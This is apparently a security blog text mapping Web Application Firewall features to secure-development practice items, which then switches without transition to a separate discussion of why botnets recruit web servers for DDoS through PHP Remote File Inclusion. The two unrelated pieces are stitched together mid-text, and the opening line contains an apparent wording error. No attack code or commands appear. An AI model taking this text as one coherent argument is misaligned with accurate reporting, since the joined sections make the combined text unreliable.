I was recently asked by a prospect how a Web Application Firewall fits into these security models and I realized that this was properly documented anywhere. Here are a few direct mappings that I came up with.

Deployment Phase

The main benefit of a WAF is that it is able to monitor the web application in real-time, in production. This addresses some of the limitations of static application assessment tools (SAST) and dynamic application assessment tools (DAST).

Specifically, items SE1.1 and SE2.3 which specify the need to "watch software" in order to conduct application input monitoring and behavioral analysis are items where a WAF's automated learning/profiling can identify when there are deviations from normal user or application behavior.

This section highlights a number of critical deployment components where WAFs help an organization.

CMVM2.1 - Be able to fix apps when they are under direct attack

Being able to implement a quick response to mitigate a live attack is critical. Even if an organization has direct access to source code and developers, the process of getting fixes into production still takes a fair amount of time. WAFs can be used to quickly implement new policy settings to protect against these attacks until the source code fixes are live. Most people think of virtual patching here but this capability also extends to other types of attacks such as denial of service and brute force attacks.

CMVM1.2 - Use ops data to change dev behavior

Being able to capture the full request/response payloads when either attacks or application errors are identified is vitally important. The fact is that most web server and application logging is terrible and only logs a small subset of the actual data. Most logs do not log full inbound request headers and body payloads and almost none log the outbound data. This data is critical, not only for incident response to identify what data was leaked, but also for remediation efforts. I mean c'mon, how can we really expect web application developers to properly correct application defects when all you give them is a web server 1-line log entry in Common Log Format? That just is not enough data for them to recreate and test the payloads to correct the issue.

The other group that really benefits from the detailed logging produced by WAFs are Quality Assurance (QA) teams. QA teams are typically in a great position in the SDLC phase to potentially catch a large number of defects, however they are typically not security folks and their test cases are focused almost exclusively on functional defects. We have seen a tremendous benefit at organizations where WAF data that is captured in production is then fed to the QA teams where they extract out the malicious request data from the event report and they create new Abuse Cases for future testing of applications.

ST3.4 - Drive testing depth

Application testing coverage is difficult. How can you ensure that your DAST tool has been able to enumerate and test out a high percentage of your site's content? Another benefit of learning WAFs is that they are able to create a SITE profile tree of all dynamic (non-static resources such as images, etc...) resources and their parameters. It is therefore possible to export out the WAF's SITE tree so that it may be integrated into the DAST data to be reconciled. I have seen examples of this where the WAF was able to identify various nooks-n-crannies deep within web applications where the automated tools just weren't able to reach on their own. Now that the DAST tool is aware of the resource location and injection points, it is much easier to test the resource properly.

Web servers are always online where as home computer systems are often shutdown when not in use. This means that the number of botnet systems in control at any one time is variable. This factors into the botnet owner's service offerings as they are often selling their botnet services and having a reliable, strong botnet is key.

Web servers have more network bandwidth than home computer users. This essentially is a Quality of Service metric where commercial web servers are guaranteed specific amounts of network bandwidth usage whereas home computer users typically have much less bandwidth. Additionally, home user network traffic is oftentimes throttled which would make their DDoS attack traffic less.

Web servers have more horse power then home computers. The number of CPUs, RAM, etc... means that commercial servers can generate much more network DDoS traffic then home computer systems.

Web servers are less likely to be blacklisted by ISP vs. home computer systems. This means that web server botnet zombies will be online, sending traffic much longer than home computers.

While the information presented by the media is interesting data, it is by no means a new tactic.

How do I know this? Because we (Breach Security) reported on this exact same concept 2 years ago in our WASC Web Hacking Incident Database Annual Report Presentation Slides. What we showed was that botnet operators have been using PHP Remote File Inclusion (RFI) attacks to try and exploit web servers in order to download DDoS client code. This will force these systems into participating in DDoS attacks. RFI attacks are still a big problem and a surprising number of sites are still vulnerable even though newer versions of PHP have a more secure default configuration that prevents this exploit from working. As it happens with other types of software, organizations are just not able to upgrade their software in a timely manner to the newest versions that fix the flaws.

REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.

While I don't disagree with some of this rationale, the fact is that there are still many, many sites that are vulnerable to RFI attacks and recruiting the compromised web site into a Botnet Army is just one of the possible bad outcomes...